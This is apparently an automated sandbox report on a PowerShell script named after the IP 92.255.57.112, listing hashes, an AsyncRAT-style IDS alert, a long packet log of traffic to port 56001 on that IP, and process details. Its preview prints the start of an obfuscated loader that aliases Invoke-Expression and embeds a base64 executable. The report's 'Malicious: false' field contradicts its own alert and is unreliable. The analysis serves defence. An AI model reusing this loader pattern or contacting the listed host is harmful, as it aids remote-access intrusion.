SHA-256: | DFD93D05F927E6A5287EF3331725A81504BAA5822A9D786F12FD173A0961141A |
SHA-512: | 9C35672C7D72C5307188380540DD4A7869041EFC5B4022F254A4CC5B832B0D48EEB60EAB0D839C7BD00AFE481E448EA247376F30DAEE14DB7506FBC8DC493600 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.908191267301583 |
TrID: | |
File name: | 92.255.57.112.ps1 |
File size: | 526'214 bytes |
MD5: | 7b7bab781f4b30aee1289f36a01606a0 |
SHA1: | 1b7a8d8302afa6f27f27d3d313865c2a4af61bdd |
SHA256: | e82de6b368baabcc81ce3316a319f27173e82b9c2e94a043bf42b62458dc5a98 |
SHA512: | 6bdbed54c70d1fbba9e5d3ef620a89c3a9a285177d2a646ecf478808d6b15372e6e3ca1b59c76a36f7a8a2a63c245b4eb6ab4a5a879ecc06446ae123ab62a927 |
SSDEEP: | 12288:eFwowo0VN2VOhllXKS2Utye+jF2RZQcqNStpIOe0Ti0dBmEv7:2S37hloSTtKF2RZQHGuvo |
TLSH: | D3B401731617FC8F67AF1F89E9003B952C7C943B6B1C4058F9C90BA990EA520DE6AD74 |
File Content Preview: | .. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T08:24:16.293498+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 92.255.57.112 | 56001 | 192.168.2.5 | 49706 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 15, 2025 08:24:15.576708078 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:15.581614017 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:15.581723928 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:15.583267927 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:15.588116884 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:15.596251011 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:15.601058960 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:16.281148911 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:16.281215906 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:16.281352043 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:16.288609028 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:16.293498039 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:16.506381035 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:16.558806896 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:17.722491980 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:17.727277040 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:17.727350950 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:17.732129097 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:39.388222933 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:39.393496990 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:39.393570900 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:39.399384022 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:39.775207996 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:39.824541092 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:39.948204041 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:39.964395046 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:39.969295025 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:39.969382048 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:39.974314928 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:53.280827045 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:53.324445963 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:24:53.448434114 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:24:53.496335983 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:01.390446901 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:01.395311117 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:01.395368099 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:01.400150061 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:01.768558025 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:01.824505091 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:01.933900118 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:01.942583084 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:01.947586060 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:01.947669983 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:01.952544928 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:23.400758982 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:23.405641079 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:23.406455994 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:23.411251068 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:23.785527945 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:23.840110064 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:23.949197054 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:23.953308105 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:23.958230972 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:23.959398985 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:23.964293957 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:45.430104017 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:45.435105085 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:45.435337067 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:45.440217972 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:45.812197924 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:45.871403933 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:45.980798006 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:45.984282970 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:45.989084005 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:45.989501953 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:45.994323969 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:55.949938059 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:55.954871893 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:55.954926014 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:55.959685087 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:56.326054096 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:56.374113083 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:56.496591091 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:56.503519058 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:56.508379936 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:25:56.508444071 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:25:56.513202906 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:11.934547901 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:11.939591885 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:11.939654112 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:11.944466114 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:12.323365927 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:12.403600931 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:12.496845007 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:12.505426884 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:12.510292053 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:12.511588097 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:12.516415119 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:23.997742891 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:24.002605915 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:24.006206989 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:24.011042118 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:24.375226021 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:24.430529118 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:24.543785095 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:24.546221018 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:24.551058054 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:24.551114082 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:24.555891037 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:29.981367111 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:29.986368895 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:29.989751101 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:29.994566917 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:30.359194040 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:30.436201096 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:30.528527975 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:30.531145096 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:30.536712885 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:30.536765099 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:30.541591883 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:30.590851068 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:30.595779896 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:30.595834970 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:30.600620985 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:30.930737019 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:31.025568008 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:31.090969086 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:31.093179941 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:31.097960949 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:31.098018885 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:31.103473902 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:34.465743065 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:34.470556974 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:34.470606089 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:34.475411892 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:34.842719078 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:34.887135983 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:35.018105984 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:35.020226955 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:35.025039911 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:35.025088072 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:35.029825926 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:52.935889006 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:52.941215038 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:52.941354036 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:52.946212053 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:53.316782951 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:53.371488094 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:53.482150078 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:53.487596989 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:53.492448092 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:26:53.495640039 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:26:53.500502110 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:00.171705961 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:00.176772118 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:00.179681063 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:00.184577942 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:00.552278042 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:00.605953932 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:00.716344118 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:00.718350887 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:00.723242998 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:00.723304033 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:00.728064060 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:05.731403112 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:05.736318111 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:05.736603975 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:05.741460085 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:06.106641054 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:06.155958891 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:06.279098988 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:06.282434940 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:06.287290096 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:06.287467003 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:06.292397976 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:07.513071060 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:07.517971992 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:07.518057108 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:07.522811890 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:07.893019915 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:07.934088945 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:08.060504913 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:08.063724041 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:08.068542957 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:08.068800926 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:08.073651075 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:28.903644085 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:28.909611940 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:28.909830093 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:28.915467978 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:29.281933069 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:29.327126026 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:29.446405888 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:29.451731920 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:29.456512928 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:29.458630085 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:29.463419914 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:48.263005018 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:48.268019915 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:48.268126965 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:48.272881031 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:48.652544975 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:48.699677944 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:48.826735020 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:48.830898046 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:48.835762024 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:48.835823059 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:48.840728045 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:49.075267076 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:49.080257893 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:49.080338001 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:49.085131884 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:49.387089014 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:49.438663960 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:49.561317921 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:49.568244934 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:49.573065042 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:27:49.573152065 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:27:49.578011036 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:05.231355906 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:05.236314058 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:05.236398935 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:05.241677046 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:05.607952118 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:05.652873039 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:05.780394077 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:05.783092022 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:05.788007021 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:05.788343906 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:05.793385983 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:11.483860016 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:11.488652945 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:11.491837978 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:11.496609926 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:11.867855072 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:11.918597937 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:12.030651093 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:12.035283089 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:12.040193081 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:12.040380955 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:12.045303106 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:16.107475042 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:16.112385988 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:16.112577915 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:16.117461920 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:16.483745098 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:16.527812004 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:16.655467987 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:16.656429052 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:16.661298037 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Jan 15, 2025 08:28:16.661381006 CET | 49706 | 56001 | 192.168.2.5 | 92.255.57.112 |
Jan 15, 2025 08:28:16.666178942 CET | 56001 | 49706 | 92.255.57.112 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 15, 2025 08:24:16.631928921 CET | 1.1.1.1 | 192.168.2.5 | 0x25f6 | No error (0) | 199.232.210.172 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 08:24:16.631928921 CET | 1.1.1.1 | 192.168.2.5 | 0x25f6 | No error (0) | 199.232.214.172 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 08:24:24.962032080 CET | 1.1.1.1 | 192.168.2.5 | 0xb553 | No error (0) | 199.232.214.172 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 08:24:24.962032080 CET | 1.1.1.1 | 192.168.2.5 | 0xb553 | No error (0) | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:24:06 |
Start date: | 15/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7be880000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 02:24:06 |
Start date: | 15/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
